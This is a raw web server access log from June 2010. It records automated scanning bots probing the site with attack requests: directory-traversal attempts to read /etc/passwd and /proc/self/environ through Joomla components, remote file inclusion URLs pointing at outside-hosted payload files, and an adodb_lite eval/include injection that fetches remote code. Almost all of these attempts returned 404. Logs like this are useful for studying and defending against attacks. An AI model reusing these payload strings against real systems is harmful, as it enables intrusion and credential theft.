69.73.166.6 - - [21/Jun/2010:01:01:41 -0400] "GET /logs/error_log.Q110060900//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.832"
188.72.70.56 - - [21/Jun/2010:01:02:00 -0400] "GET /logs/access_log.Q110052800//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.834"
188.72.70.56 - - [21/Jun/2010:01:02:21 -0400] "GET /logs/access_log.Q110052800//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.834"
75.125.138.2 - - [21/Jun/2010:01:02:22 -0400] "GET //galeria.php?start=0&kategoria=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
75.125.138.2 - - [21/Jun/2010:01:02:22 -0400] "GET /logs/access_log.Q109102900//galeria.php?start=0&kategoria=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
75.125.138.2 - - [21/Jun/2010:01:02:22 -0400] "GET /logs/access_log.Q109102900//galeria.php?start=0&kategoria=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
75.125.138.2 - - [21/Jun/2010:01:02:22 -0400] "GET //galeria.php?start=0&kategoria=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
75.125.138.2 - - [21/Jun/2010:01:02:23 -0400] "GET /logs//galeria.php?start=0&kategoria=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
75.125.138.2 - - [21/Jun/2010:01:02:23 -0400] "GET /logs//galeria.php?start=0&kategoria=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
75.125.138.2 - - [21/Jun/2010:01:02:24 -0400] "GET /logs/access_log.Q109102900//galeria.php?start=0&kategoria=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
75.125.138.2 - - [21/Jun/2010:01:02:24 -0400] "GET /logs//galeria.php?start=0&kategoria=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
75.125.138.2 - - [21/Jun/2010:01:02:24 -0400] "GET //galeria.php?start=0&kategoria=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
75.125.138.2 - - [21/Jun/2010:01:02:24 -0400] "GET /logs//galeria.php?start=0&kategoria=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
75.125.138.2 - - [21/Jun/2010:01:02:24 -0400] "GET /logs/access_log.Q109102900//galeria.php?start=0&kategoria=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
75.125.138.2 - - [21/Jun/2010:01:02:24 -0400] "GET //galeria.php?start=0&kategoria=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
75.125.138.2 - - [21/Jun/2010:01:02:33 -0400] "GET //galeria.php?start=0&kategoria=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
75.125.138.2 - - [21/Jun/2010:01:02:33 -0400] "GET /logs/access_log.Q109102900%20%20//galeria.php?start=0&kategoria=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
75.125.138.2 - - [21/Jun/2010:01:02:33 -0400] "GET /logs/access_log.Q109102900%20%20//galeria.php?start=0&kategoria=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
75.125.138.2 - - [21/Jun/2010:01:02:33 -0400] "GET /logs//galeria.php?start=0&kategoria=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
75.125.138.2 - - [21/Jun/2010:01:02:33 -0400] "GET //galeria.php?start=0&kategoria=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
75.125.138.2 - - [21/Jun/2010:01:02:33 -0400] "GET /logs//galeria.php?start=0&kategoria=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
75.125.138.2 - - [21/Jun/2010:01:03:48 -0400] "GET //galeria.php?start=0&kategoria=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
75.125.138.2 - - [21/Jun/2010:01:03:48 -0400] "GET /logs//galeria.php?start=0&kategoria=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
75.125.138.2 - - [21/Jun/2010:01:03:48 -0400] "GET /logs/access_log.Q109081600//galeria.php?start=0&kategoria=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
75.125.138.2 - - [21/Jun/2010:01:03:48 -0400] "GET //galeria.php?start=0&kategoria=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
75.125.138.2 - - [21/Jun/2010:01:03:49 -0400] "GET /logs/access_log.Q109081600//galeria.php?start=0&kategoria=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
75.125.138.2 - - [21/Jun/2010:01:03:49 -0400] "GET /logs//galeria.php?start=0&kategoria=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
209.116.59.107 - - [21/Jun/2010:01:03:59 -0400] "GET //bookmark4u/lostpasswd.php?env[incude_prefix]=http://www.pyungsan.or.kr/bbs/id1.txt??? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
209.116.59.107 - - [21/Jun/2010:01:03:59 -0400] "GET /logs//bookmark4u/lostpasswd.php?env[incude_prefix]=http://www.pyungsan.or.kr/bbs/id1.txt??? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
209.116.59.107 - - [21/Jun/2010:01:03:59 -0400] "GET /logs/error_log.Q109100600//bookmark4u/lostpasswd.php?env[incude_prefix]=http://www.pyungsan.or.kr/bbs/id1.txt??? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
75.125.138.2 - - [21/Jun/2010:01:04:05 -0400] "GET /logs/access_log.Q109100200//galeria.php?start=0&kategoria=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
75.125.138.2 - - [21/Jun/2010:01:04:32 -0400] "GET /logs/access_log.Q109100200//galeria.php?start=0&kategoria=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
209.116.59.107 - - [21/Jun/2010:01:04:38 -0400] "GET /logs/error_log.Q109100600%20%20//bookmark4u/lostpasswd.php?env[incude_prefix]=http://www.pyungsan.or.kr/bbs/id1.txt??? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
121.78.118.123 - - [21/Jun/2010:01:04:58 -0400] "GET /logs/access_log.Q109082000/index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
121.78.118.123 - - [21/Jun/2010:01:04:59 -0400] "GET /index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 207 "-" "libwww-perl/5.805"
121.78.118.123 - - [21/Jun/2010:01:04:59 -0400] "GET /logs/index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 212 "-" "libwww-perl/5.805"
67.15.152.183 - - [21/Jun/2010:01:05:57 -0400] "GET /logs/error_log.Q110060800/index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 233 "-" "libwww-perl/5.65"
67.15.152.183 - - [21/Jun/2010:01:05:57 -0400] "GET /index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 207 "-" "libwww-perl/5.65"
67.15.152.183 - - [21/Jun/2010:01:05:57 -0400] "GET /logs/index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 212 "-" "libwww-perl/5.65"
62.44.82.118 - - [21/Jun/2010:01:05:58 -0400] "GET /logs/access_log.Q110060700//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.803"
67.15.152.183 - - [21/Jun/2010:01:06:08 -0400] "GET /index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 207 "-" "libwww-perl/5.65"
67.15.152.183 - - [21/Jun/2010:01:06:09 -0400] "GET /index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 207 "-" "libwww-perl/5.65"
209.59.12.99 - - [21/Jun/2010:01:06:27 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
188.72.70.56 - - [21/Jun/2010:01:06:32 -0400] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.834"
188.72.70.56 - - [21/Jun/2010:01:06:33 -0400] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.834"
188.72.70.56 - - [21/Jun/2010:01:06:39 -0400] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.834"
188.72.70.56 - - [21/Jun/2010:01:06:39 -0400] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.834"
188.72.70.56 - - [21/Jun/2010:01:06:52 -0400] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.834"
188.72.70.56 - - [21/Jun/2010:01:06:53 -0400] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.834"
188.72.70.56 - - [21/Jun/2010:01:06:53 -0400] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.834"
188.72.70.56 - - [21/Jun/2010:01:07:02 -0400] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.834"
188.72.70.56 - - [21/Jun/2010:01:07:03 -0400] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.834"
188.72.70.56 - - [21/Jun/2010:01:07:04 -0400] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.834"
188.72.70.56 - - [21/Jun/2010:01:07:06 -0400] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.834"
188.72.70.56 - - [21/Jun/2010:01:07:06 -0400] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.834"
205.186.131.199 - - [21/Jun/2010:01:07:14 -0400] "GET /spaw/spaw_control.class.php?spaw_root=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 225 "-" "libwww-perl/5.805"
205.251.131.18 - - [21/Jun/2010:01:07:26 -0400] "GET /spaw/spaw_control.class.php?spaw_root=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 225 "-" "libwww-perl/5.805"
67.15.152.183 - - [21/Jun/2010:01:07:38 -0400] "GET /index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 207 "-" "libwww-perl/5.65"
67.15.152.183 - - [21/Jun/2010:01:07:38 -0400] "GET /index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 207 "-" "libwww-perl/5.65"
67.15.152.183 - - [21/Jun/2010:01:07:39 -0400] "GET /index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 207 "-" "libwww-perl/5.65"
67.228.85.91 - - [21/Jun/2010:01:08:26 -0400] "GET /index.php?option=com_myfiles&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 207 "-" "libwww-perl/5.832"
205.186.131.199 - - [21/Jun/2010:01:08:28 -0400] "GET /logs/access_log.Q109081600/spaw/spaw_control.class.php?spaw_root=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 252 "-" "libwww-perl/5.805"
205.186.131.199 - - [21/Jun/2010:01:08:28 -0400] "GET /spaw/spaw_control.class.php?spaw_root=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 225 "-" "libwww-perl/5.805"
205.186.131.199 - - [21/Jun/2010:01:08:28 -0400] "GET /logs/spaw/spaw_control.class.php?spaw_root=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 230 "-" "libwww-perl/5.805"
209.200.244.57 - - [21/Jun/2010:01:08:30 -0400] "GET /index.php?option=com_myfiles&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 207 "-" "libwww-perl/5.805"
174.121.216.99 - - [21/Jun/2010:01:08:33 -0400] "GET /index.php?option=com_myfiles&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 207 "-" "libwww-perl/5.810"
209.200.244.57 - - [21/Jun/2010:01:08:42 -0400] "GET /logs/access_log.Q110052800/index.php?option=com_myfiles&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
209.200.244.57 - - [21/Jun/2010:01:08:42 -0400] "GET /index.php?option=com_myfiles&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 207 "-" "libwww-perl/5.805"
209.200.244.57 - - [21/Jun/2010:01:08:43 -0400] "GET /logs/index.php?option=com_myfiles&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 212 "-" "libwww-perl/5.805"
174.121.216.99 - - [21/Jun/2010:01:08:45 -0400] "GET /logs/access_log.Q110052800/index.php?option=com_myfiles&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.810"
174.121.216.99 - - [21/Jun/2010:01:08:45 -0400] "GET /index.php?option=com_myfiles&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 207 "-" "libwww-perl/5.810"
174.121.216.99 - - [21/Jun/2010:01:08:45 -0400] "GET /logs/index.php?option=com_myfiles&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 212 "-" "libwww-perl/5.810"
67.228.85.91 - - [21/Jun/2010:01:08:46 -0400] "GET /logs/access_log.Q110052800/index.php?option=com_myfiles&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.832"
67.228.85.91 - - [21/Jun/2010:01:08:46 -0400] "GET /index.php?option=com_myfiles&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 207 "-" "libwww-perl/5.832"
67.228.85.91 - - [21/Jun/2010:01:08:46 -0400] "GET /logs/index.php?option=com_myfiles&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 212 "-" "libwww-perl/5.832"
209.200.244.57 - - [21/Jun/2010:01:09:25 -0400] "GET /logs/access_log.Q110052200/index.php?option=com_myfiles&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
205.186.131.199 - - [21/Jun/2010:01:09:37 -0400] "GET /logs/access_log.Q109101500/spaw/spaw_control.class.php?spaw_root=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 252 "-" "libwww-perl/5.805"
205.186.131.199 - - [21/Jun/2010:01:09:37 -0400] "GET /spaw/spaw_control.class.php?spaw_root=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 225 "-" "libwww-perl/5.805"
205.186.131.199 - - [21/Jun/2010:01:09:37 -0400] "GET /logs/spaw/spaw_control.class.php?spaw_root=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 230 "-" "libwww-perl/5.805"
67.15.152.183 - - [21/Jun/2010:01:09:41 -0400] "GET /index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 207 "-" "libwww-perl/5.65"
174.121.216.99 - - [21/Jun/2010:01:09:46 -0400] "GET /logs/access_log.Q110052200/index.php?option=com_myfiles&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.810"
205.251.131.18 - - [21/Jun/2010:01:09:46 -0400] "GET /logs/access_log.Q109101500/spaw/spaw_control.class.php?spaw_root=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 252 "-" "libwww-perl/5.805"
205.251.131.18 - - [21/Jun/2010:01:09:46 -0400] "GET /spaw/spaw_control.class.php?spaw_root=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 225 "-" "libwww-perl/5.805"
205.251.131.18 - - [21/Jun/2010:01:09:46 -0400] "GET /logs/spaw/spaw_control.class.php?spaw_root=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 230 "-" "libwww-perl/5.805"
67.228.85.91 - - [21/Jun/2010:01:10:02 -0400] "GET /logs/access_log.Q110052200/index.php?option=com_myfiles&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.832"
111.90.150.79 - - [21/Jun/2010:01:12:03 -0400] "GET /logs/access_log.Q110052800/index.php?option=com_myfiles&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.810"
111.90.150.79 - - [21/Jun/2010:01:12:04 -0400] "GET /index.php?option=com_myfiles&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 207 "-" "libwww-perl/5.810"
111.90.150.79 - - [21/Jun/2010:01:12:14 -0400] "GET /logs/index.php?option=com_myfiles&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 212 "-" "libwww-perl/5.810"
67.15.152.183 - - [21/Jun/2010:01:12:39 -0400] "GET /logs/error_log.Q110052100/index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 233 "-" "libwww-perl/5.65"
67.15.152.183 - - [21/Jun/2010:01:12:39 -0400] "GET /index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 207 "-" "libwww-perl/5.65"
67.15.152.183 - - [21/Jun/2010:01:12:39 -0400] "GET /logs/index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 212 "-" "libwww-perl/5.65"
67.195.114.223 - - [21/Jun/2010:01:12:15 -0400] "GET /logs/error_log.Q110012300 HTTP/1.0" 200 3106679 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
67.15.152.183 - - [21/Jun/2010:01:12:45 -0400] "GET /logs/error_log.Q110052100/index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 233 "-" "libwww-perl/5.65"
67.15.152.183 - - [21/Jun/2010:01:12:45 -0400] "GET /index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 207 "-" "libwww-perl/5.65"
67.15.152.183 - - [21/Jun/2010:01:12:45 -0400] "GET /logs/index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 212 "-" "libwww-perl/5.65"
67.15.152.183 - - [21/Jun/2010:01:12:58 -0400] "GET /logs/access_log.Q110052100/index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.65"
202.125.152.246 - - [21/Jun/2010:01:13:01 -0400] "GET /logs/index.php?option=com_mamblog&Itemid=&mosConfig_absolute_path=http://www.biasy.net//modules/news_afp/idxx.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
202.125.152.246 - - [21/Jun/2010:01:13:01 -0400] "GET /index.php?option=com_mamblog&Itemid=&mosConfig_absolute_path=http://www.biasy.net//modules/news_afp/idxx.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
67.15.152.183 - - [21/Jun/2010:01:13:01 -0400] "GET /logs/access_log.Q110052100/index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.65"
67.15.152.183 - - [21/Jun/2010:01:13:04 -0400] "GET /logs/error_log.Q110052100/index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 233 "-" "libwww-perl/5.65"
67.15.152.183 - - [21/Jun/2010:01:13:04 -0400] "GET /index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 207 "-" "libwww-perl/5.65"
67.15.152.183 - - [21/Jun/2010:01:13:04 -0400] "GET /logs/index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 212 "-" "libwww-perl/5.65"
202.125.152.246 - - [21/Jun/2010:01:13:05 -0400] "GET /logs/access_log.Q109053100%20%20/index.php?option=com_mamblog&Itemid=&mosConfig_absolute_path=http://www.biasy.net//modules/news_afp/idxx.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
67.15.152.183 - - [21/Jun/2010:01:13:10 -0400] "GET /logs/access_log.Q110051800/index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.65"
67.15.152.183 - - [21/Jun/2010:01:13:10 -0400] "GET /index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 207 "-" "libwww-perl/5.65"
67.15.152.183 - - [21/Jun/2010:01:13:10 -0400] "GET /logs/index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 212 "-" "libwww-perl/5.65"
67.195.114.223 - - [21/Jun/2010:01:12:43 -0400] "GET /logs/error_log.Q110012300 HTTP/1.0" 200 3106679 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
67.15.152.183 - - [21/Jun/2010:01:13:19 -0400] "GET /logs/access_log.Q110052100/index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.65"
64.15.156.75 - - [21/Jun/2010:01:13:34 -0400] "GET /logs/access_log.Q109080600//lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.biasy.net//modules/news_afp/idxx.txt?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
64.15.156.75 - - [21/Jun/2010:01:13:34 -0400] "GET //lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.biasy.net//modules/news_afp/idxx.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
64.15.156.75 - - [21/Jun/2010:01:13:34 -0400] "GET /logs//lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.biasy.net//modules/news_afp/idxx.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
209.59.12.99 - - [21/Jun/2010:01:14:31 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
67.15.152.183 - - [21/Jun/2010:01:14:45 -0400] "GET /logs/error_log.Q110060800/index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 233 "-" "libwww-perl/5.65"
